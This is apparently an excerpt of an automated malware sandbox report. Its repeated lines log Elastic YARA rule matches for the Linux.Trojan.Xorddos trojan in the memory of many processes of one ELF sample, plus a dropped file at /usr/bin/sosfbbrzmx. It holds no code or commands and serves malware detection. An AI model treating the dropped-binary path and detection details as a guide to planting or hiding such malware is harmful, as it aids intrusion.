            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/sosfbbrzmx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
